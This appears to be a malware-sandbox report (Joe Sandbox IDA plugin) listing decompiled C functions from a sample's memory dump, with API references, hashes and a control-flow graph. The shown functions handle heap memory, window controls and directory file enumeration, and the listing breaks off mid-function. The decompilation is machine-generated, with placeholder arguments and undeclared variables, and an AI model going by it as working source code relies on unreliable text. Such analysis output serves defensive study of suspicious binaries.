                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00407650(void* __ecx, void** _a4, char* _a8) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					if( *_a4 != 0) {
                                                                                                                                                  						_t21 =  *0x40b3b4; // 0x21d0000
                                                                                                                                                  						HeapFree(_t21, 1,  *_a4);
                                                                                                                                                  						 *_a4 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_v8 = strlen(_a8);
                                                                                                                                                  					if( *_a4 != 0) {
                                                                                                                                                  						_t42 =  *0x40b3b4; // 0x21d0000
                                                                                                                                                  						 *_a4 = RtlReAllocateHeap(_t42, 1,  *_a4, _v8 + 5);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t29 =  *0x40b3b4; // 0x21d0000
                                                                                                                                                  						 *_a4 = RtlAllocateHeap(_t29, 1, _v8 + 5);
                                                                                                                                                  					}
                                                                                                                                                  					E00407810(_a4,  *_a4, _a8, _v8);
                                                                                                                                                  				}
                                                                                                                                                  				return _v8 + 1;
                                                                                                                                                  			}







                                                                                                                                                  0x00407654
                                                                                                                                                  0x0040765f
                                                                                                                                                  0x004076d0
                                                                                                                                                  0x004076da
                                                                                                                                                  0x004076e0
                                                                                                                                                  0x004076e9
                                                                                                                                                  0x004076e9
                                                                                                                                                  0x00407661
                                                                                                                                                  0x0040766d
                                                                                                                                                  0x00407676
                                                                                                                                                  0x004076a3
                                                                                                                                                  0x004076b3
                                                                                                                                                  0x00407678
                                                                                                                                                  0x00407681
                                                                                                                                                  0x00407690
                                                                                                                                                  0x00407690
                                                                                                                                                  0x004076c3
                                                                                                                                                  0x004076c3
                                                                                                                                                  0x004076f8

                                                                                                                                                  APIs
                                                                                                                                                  • strlen.MSVCRT ref: 00407665
                                                                                                                                                  • RtlAllocateHeap.NTDLL(021D0000,00000001,-00000005), ref: 00407687
                                                                                                                                                  • RtlReAllocateHeap.NTDLL(021D0000,00000001,?,-00000005), ref: 004076AA
                                                                                                                                                  • HeapFree.KERNEL32(021D0000,00000001), ref: 004076E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Allocate$Freestrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3543670626-0
                                                                                                                                                  • Opcode ID: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                                                                                                                                  • Instruction ID: 9a70041e5ee9e3aa3c8356125c7a9a49bf0f5e47ff7a9399fb27335f50f92b23
                                                                                                                                                  • Opcode Fuzzy Hash: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                                                                                                                                  • Instruction Fuzzy Hash: F0215EB4A00208EFCB00CF58C984FAA37B5EF88314F20C469F8059B395D776AE41DB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405C1A(struct HWND__* _a4, intOrPtr* _a8) {
                                                                                                                                                  				struct HWND__* _t12;
                                                                                                                                                  				struct HWND__* _t14;
                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t14 = _a4;
                                                                                                                                                  				_t16 = 1;
                                                                                                                                                  				if(IsWindowEnabled(_t14) != 0 && IsWindowVisible(_t14) != 0 && (GetWindowLongA(_t14, 0xfffffff0) & 0x00010000) != 0) {
                                                                                                                                                  					_t18 = _a8;
                                                                                                                                                  					if( *_t18 == _t14) {
                                                                                                                                                  						_t12 =  *(_t18 + 4);
                                                                                                                                                  						if(_t12 != 0) {
                                                                                                                                                  							SetFocus(_t12);
                                                                                                                                                  							 *((intOrPtr*)(_t18 + 0xc)) = 1;
                                                                                                                                                  							_t16 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t18 + 4) = _t14;
                                                                                                                                                  				}
                                                                                                                                                  				return _t16;
                                                                                                                                                  			}






                                                                                                                                                  0x00405c1b
                                                                                                                                                  0x00405c23
                                                                                                                                                  0x00405c2c
                                                                                                                                                  0x00405c4a
                                                                                                                                                  0x00405c50
                                                                                                                                                  0x00405c52
                                                                                                                                                  0x00405c57
                                                                                                                                                  0x00405c5a
                                                                                                                                                  0x00405c60
                                                                                                                                                  0x00405c63
                                                                                                                                                  0x00405c63
                                                                                                                                                  0x00405c57
                                                                                                                                                  0x00405c65
                                                                                                                                                  0x00405c68
                                                                                                                                                  0x00405c6d

                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00405C24
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405C2F
                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00405C3C
                                                                                                                                                  • SetFocus.USER32(?), ref: 00405C5A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$EnabledFocusLongVisible
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 599048109-0
                                                                                                                                                  • Opcode ID: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                                                                                                                                  • Instruction ID: 9b191372e45709e83f1cce7d42dee75ff49b7deadfcab72b6d2fd196ff601546
                                                                                                                                                  • Opcode Fuzzy Hash: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                                                                                                                                  • Instruction Fuzzy Hash: 04F0DA752087019BE7209F36DE8CA57B7ACFB94751718843AB496E3290CB38D851CA69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004051A3(struct HWND__* _a4, struct tagPOINT _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  
                                                                                                                                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0) {
                                                                                                                                                  					MapWindowPoints(0, GetParent(_a4),  &_a8, 2);
                                                                                                                                                  				}
                                                                                                                                                  				return MoveWindow(_a4, _a8.x, _a12, _a16 - _a8, _a20 - _a12, 1);
                                                                                                                                                  			}



                                                                                                                                                  0x004051b6
                                                                                                                                                  0x004051ca
                                                                                                                                                  0x004051ca
                                                                                                                                                  0x004051f0

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004051AB
                                                                                                                                                  • GetParent.USER32(?), ref: 004051C1
                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000), ref: 004051CA
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004051E9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$LongMoveParentPoints
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 473562985-0
                                                                                                                                                  • Opcode ID: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                                                                                                                                  • Instruction ID: 050705d4d46781d10eeea3c7f9e2e02fa34a3de8c5ebb1e511241672335786dd
                                                                                                                                                  • Opcode Fuzzy Hash: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                                                                                                                                  • Instruction Fuzzy Hash: 4EF07472140209BFDF019F98DD49FAA3B69FB08751F00C125BE19AA1A0C771D9619B55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004041CF(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				struct HWND__** _t24;
                                                                                                                                                  				signed int _t25;
                                                                                                                                                  				struct HWND__* _t28;
                                                                                                                                                  
                                                                                                                                                  				_t24 = E0040642D( *0x40b428);
                                                                                                                                                  				if( *0x40b26c == 0) {
                                                                                                                                                  					memset(0x40b1d8, 0, 0x94);
                                                                                                                                                  					 *0x40b1d8 = 3;
                                                                                                                                                  					 *0x40b1dc = 0x94;
                                                                                                                                                  					 *0x40b1e0 = E0040416A;
                                                                                                                                                  					 *0x40b250 = E00404680;
                                                                                                                                                  					 *0x40b254 = E004046DA;
                                                                                                                                                  					 *0x40b1e4 = E00404700;
                                                                                                                                                  					 *0x40b26c = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a24 == 0) {
                                                                                                                                                  					_a24 = 0x409000;
                                                                                                                                                  				}
                                                                                                                                                  				_t25 = _a28;
                                                                                                                                                  				_t26 = _t25 | 0x50020000;
                                                                                                                                                  				_t28 = CreateWindowExA(_t25 >> 0x00000008 & 0x00000200, "Static", _a24, _t25 | 0x50020000, _a8, _a12, _a16, _a20,  *_t24, 0xffffffff,  *0x40b0fc, 0);
                                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                                  					_t21 = E0040662C( *0x40b424, _a4);
                                                                                                                                                  					 *(_t21 + 0x14) =  *(_t21 + 0x14) | 0xffffffff;
                                                                                                                                                  					 *(_t21 + 0x10) =  *(_t21 + 0x10) | 0xffffffff;
                                                                                                                                                  					_t28 = E004047BB(_t26, _a4, _t21, _t28, 0x40b1d8);
                                                                                                                                                  				}
                                                                                                                                                  				return _t28;
                                                                                                                                                  			}







                                                                                                                                                  0x004041e7
                                                                                                                                                  0x004041ee
                                                                                                                                                  0x004041f9
                                                                                                                                                  0x00404201
                                                                                                                                                  0x0040420b
                                                                                                                                                  0x00404211
                                                                                                                                                  0x0040421b
                                                                                                                                                  0x00404225
                                                                                                                                                  0x0040422f
                                                                                                                                                  0x00404239
                                                                                                                                                  0x00404239
                                                                                                                                                  0x00404247
                                                                                                                                                  0x00404249
                                                                                                                                                  0x00404249
                                                                                                                                                  0x00404250
                                                                                                                                                  0x00404261
                                                                                                                                                  0x0040428b
                                                                                                                                                  0x0040428f
                                                                                                                                                  0x0040429a
                                                                                                                                                  0x0040429f
                                                                                                                                                  0x004042a3
                                                                                                                                                  0x004042b2
                                                                                                                                                  0x004042b2
                                                                                                                                                  0x004042ba

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 004041F9
                                                                                                                                                  • CreateWindowExA.USER32(?,Static,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404285
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindowmemset
                                                                                                                                                  • String ID: Static
                                                                                                                                                  • API String ID: 1730425660-2272013587
                                                                                                                                                  • Opcode ID: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                                                                                                                                  • Instruction ID: da57442342e235b20ab9d9cc299fb314f46126ddfb0dd979976cb01a117c754a
                                                                                                                                                  • Opcode Fuzzy Hash: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                                                                                                                                  • Instruction Fuzzy Hash: D7215BB1500205AFDB115F51ED09F5B3F69EB85364F00823AFA247A2E1C3BA8921DBDC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E004044F0(void* __ecx, intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                                                                                                                                  				struct HWND__** _v8;
                                                                                                                                                  				struct HWND__** _t13;
                                                                                                                                                  				struct HWND__* _t32;
                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                  
                                                                                                                                                  				_t27 = __ecx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t13 = E0040642D( *0x40b428);
                                                                                                                                                  				_t37 =  *0x40b3a4; // 0x0
                                                                                                                                                  				_v8 = _t13;
                                                                                                                                                  				if(_t37 == 0) {
                                                                                                                                                  					memset(0x40b310, 0, 0x94);
                                                                                                                                                  					 *0x40b310 = 1;
                                                                                                                                                  					 *0x40b314 = 0x94;
                                                                                                                                                  					 *0x40b320 = E004044D5;
                                                                                                                                                  					 *0x40b324 = E004044B3;
                                                                                                                                                  					 *0x40b3a4 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a24 == 0) {
                                                                                                                                                  					_a24 = 0x409000;
                                                                                                                                                  				}
                                                                                                                                                  				_t32 = CreateWindowExA(0, "Button", _a24, _a28 | 0x50030000, _a8, _a12, _a16, _a20,  *_v8, 0xffffffff,  *0x40b0fc, 0);
                                                                                                                                                  				if(_t32 != 0) {
                                                                                                                                                  					_t32 = E004047BB(_t27, _a4, E0040662C( *0x40b424, _a4), _t32, 0x40b310);
                                                                                                                                                  				}
                                                                                                                                                  				return _t32;
                                                                                                                                                  			}







                                                                                                                                                  0x004044f0
                                                                                                                                                  0x004044f3
                                                                                                                                                  0x004044fd
                                                                                                                                                  0x00404504
                                                                                                                                                  0x0040450a
                                                                                                                                                  0x00404512
                                                                                                                                                  0x0040451c
                                                                                                                                                  0x00404527
                                                                                                                                                  0x0040452c
                                                                                                                                                  0x00404532
                                                                                                                                                  0x0040453c
                                                                                                                                                  0x00404546
                                                                                                                                                  0x00404546
                                                                                                                                                  0x0040454e
                                                                                                                                                  0x00404550
                                                                                                                                                  0x00404550
                                                                                                                                                  0x00404589
                                                                                                                                                  0x0040458d
                                                                                                                                                  0x004045a8
                                                                                                                                                  0x004045a8
                                                                                                                                                  0x004045b0

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 0040451C
                                                                                                                                                  • CreateWindowExA.USER32(00000000,Button,?,?,?,?,?,?,?,000000FF,00000000), ref: 00404583
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindowmemset
                                                                                                                                                  • String ID: Button
                                                                                                                                                  • API String ID: 1730425660-1034594571
                                                                                                                                                  • Opcode ID: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                                                                                                                                  • Instruction ID: c03ed1e6e3b39e81b365a7cda6e144c566f8838bc6f058065528baead89b727a
                                                                                                                                                  • Opcode Fuzzy Hash: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                                                                                                                                  • Instruction Fuzzy Hash: DF118EB2400119BFCB119F55DE45DAB3FB8EB48358B10403AFA15B62A1D3798D20DBEC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E00405625(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				intOrPtr* _t16;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  
                                                                                                                                                  				_t20 = 0xd0d0d0d1;
                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                  					L6:
                                                                                                                                                  					return _t20;
                                                                                                                                                  				}
                                                                                                                                                  				_t11 = GetPropA(_a4, "PB_ID");
                                                                                                                                                  				_t18 = _t11;
                                                                                                                                                  				if(_t11 == GetWindowLongA(_a4, 0xfffffff4)) {
                                                                                                                                                  					_t13 = E00406690( *0x40b424, _t18);
                                                                                                                                                  					if(_t13 != 0) {
                                                                                                                                                  						_t16 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 4)) + 8));
                                                                                                                                                  						if(_t16 != 0) {
                                                                                                                                                  							_t20 =  *_t16(_t13, _a8, _a12, _a16, _a20);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				goto L6;
                                                                                                                                                  			}







                                                                                                                                                  0x0040562d
                                                                                                                                                  0x00405632
                                                                                                                                                  0x00405680
                                                                                                                                                  0x00405684
                                                                                                                                                  0x00405684
                                                                                                                                                  0x0040563d
                                                                                                                                                  0x00405648
                                                                                                                                                  0x00405652
                                                                                                                                                  0x0040565b
                                                                                                                                                  0x00405662
                                                                                                                                                  0x00405667
                                                                                                                                                  0x0040566c
                                                                                                                                                  0x0040567d
                                                                                                                                                  0x0040567d
                                                                                                                                                  0x0040566c
                                                                                                                                                  0x00405662
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetPropA.USER32(00000000,PB_ID), ref: 0040563D
                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F4), ref: 0040564A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongPropWindow
                                                                                                                                                  • String ID: PB_ID
                                                                                                                                                  • API String ID: 2492497586-4173770792
                                                                                                                                                  • Opcode ID: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                                                                                                                                  • Instruction ID: dcde74696da6f989fa088eeb670c0edb8cd62ec8937a9ae86c05ee9430180859
                                                                                                                                                  • Opcode Fuzzy Hash: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                                                                                                                                  • Instruction Fuzzy Hash: C3F06232100208ABCF115F64DD08E6B7BAAEB54350B44443AFD0DB22A0C736CC61DB98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00404836(struct HWND__* _a4) {
                                                                                                                                                  				struct HWND__* _t5;
                                                                                                                                                  				struct HWND__* _t7;
                                                                                                                                                  
                                                                                                                                                  				_t5 = _a4;
                                                                                                                                                  				_t7 = GetParent(_t5);
                                                                                                                                                  				while(_t7 != 0) {
                                                                                                                                                  					if(GetPropA(_t5, "PB_WindowID") == 0) {
                                                                                                                                                  						_t5 = _t7;
                                                                                                                                                  						_t7 = GetParent(_t7);
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				return _t5;
                                                                                                                                                  			}





                                                                                                                                                  0x00404837
                                                                                                                                                  0x0040485b
                                                                                                                                                  0x00404859
                                                                                                                                                  0x00404854
                                                                                                                                                  0x00404856
                                                                                                                                                  0x0040485b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040485b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404854
                                                                                                                                                  0x00404866

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ParentProp
                                                                                                                                                  • String ID: PB_WindowID
                                                                                                                                                  • API String ID: 919147419-1508741625
                                                                                                                                                  • Opcode ID: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                                                                                                                                  • Instruction ID: eb09f32ff92d9ce12a6399f95510d521de9387f6d8f05edb00c370aed95cd547
                                                                                                                                                  • Opcode Fuzzy Hash: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                                                                                                                                  • Instruction Fuzzy Hash: 5CD0C2B770132167C221662A5C84E4796ACAAD8B60300C43BF701F3251C278CC0182E9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 870 405bd2-405bec call 406e67 873 405bf2-405bf7 870->873 874 405dae-405db3 870->874 875 405bf9-405bfd 873->875 876 405c0e-405c19 call 40e218 873->876 877 405db5-405db8 874->877 878 405dc9-405dd4 call 40e1e9 874->878 875->876 881 405bff-405c0c call 40e40c 875->881 886 405c1e-405c2e 876->886 877->878 879 405dba-405dc7 call 40a450 877->879 884 405dd9-405de9 878->884 879->884 881->886 888 405e21-405e2c FindNextFileA 884->888 889 405deb-405dfd FindFirstFileA 884->889 891 405c30-405c42 FindFirstFileW 886->891 892 405c64-405c6f FindNextFileW 886->892 893 405e43-405e46 888->893 894 405e2e-405e3d 888->894 897 405e4c-405f54 call 40a450 call 4073b4 call 40a450 call 40e218 call 401030 call 40a450 call 40e04d * 3 call 40dfa5 call 40db6d 889->897 898 405dff-405e08 889->898 899 405c44-405c4d 891->899 900 405c8f-405d9e call 40e40c call 40740b call 40e40c call 40e1e9 call 401030 call 40e1e9 call 40e04d * 3 call 40dfa5 call 40db8b 891->900 895 405c71-405c80 892->895 896 405c86-405c89 892->896 893->897 901 405f5b-405f6c 893->901 894->893 895->896 896->900 896->901 897->901 957 405f56-405f58 897->957 912 405e14 898->912 913 405e0a 898->913 899->912 914 405c53-405c56 899->914 900->901 958 405da4-405da9 900->958 919 405e16-405e1c 912->919 918 405e0d 913->918 914->912 915 405c5c-405c5f 914->915 915->918 918->912 922 405e0f-405e12 918->922 919->901 922->919 957->901 958->901
                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E00405BD2(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				char* _t98;
                                                                                                                                                  				void* _t134;
                                                                                                                                                  				char _t136;
                                                                                                                                                  				short* _t140;
                                                                                                                                                  				intOrPtr _t169;
                                                                                                                                                  				void* _t175;
                                                                                                                                                  				long _t176;
                                                                                                                                                  				signed int _t179;
                                                                                                                                                  				void* _t180;
                                                                                                                                                  				short* _t182;
                                                                                                                                                  				void* _t183;
                                                                                                                                                  				void* _t186;
                                                                                                                                                  				intOrPtr _t197;
                                                                                                                                                  				short* _t204;
                                                                                                                                                  				intOrPtr _t206;
                                                                                                                                                  				void* _t208;
                                                                                                                                                  				void* _t210;
                                                                                                                                                  				void* _t221;
                                                                                                                                                  
                                                                                                                                                  				_t197 = __edx;
                                                                                                                                                  				_t186 = __ecx;
                                                                                                                                                  				_t208 = _t210 - 0x68;
                                                                                                                                                  				_push(_t179);
                                                                                                                                                  				if(E00406E67() == 0) {
                                                                                                                                                  					_t98 =  *((intOrPtr*)(_t208 + 0x74));
                                                                                                                                                  					if(_t98 == 0 ||  *_t98 == 0) {
                                                                                                                                                  						E0040E1E9(_t186,  *((intOrPtr*)(_t208 + 0x78)), _t208 - 0x5e8, 0x1000000);
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040A450(_t208 - 0x5e8, _t98);
                                                                                                                                                  					}
                                                                                                                                                  					_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                  					_t180 = _t179 | 0xffffffff;
                                                                                                                                                  					_push(_t208 - 0xd8);
                                                                                                                                                  					if( *(_t208 + 0x70) != _t180) {
                                                                                                                                                  						if(FindNextFileA( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                  							 *(_t208 + 0x70) = _t180;
                                                                                                                                                  							 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t131 != 0x00000012;
                                                                                                                                                  						}
                                                                                                                                                  						if( *(_t208 + 0x70) == _t180) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t134 = FindFirstFileA(_t208 - 0x5e8, ??);
                                                                                                                                                  						 *(_t208 + 0x70) = _t134;
                                                                                                                                                  						if(_t134 != _t180) {
                                                                                                                                                  							L30:
                                                                                                                                                  							E0040A450(_t206, _t208 - 0x5e8);
                                                                                                                                                  							E0040A450(E004073B4(_t206), _t208 - 0xac);
                                                                                                                                                  							_t182 = _t206 + 0x400;
                                                                                                                                                  							E0040E218(_t206, _t182, 0x1000000);
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0xbc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0xb8));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0xd8));
                                                                                                                                                  							asm("adc edx, edi");
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                  							E0040A450(_t206 + 0xc80, _t208 + 0x58);
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0xd4));
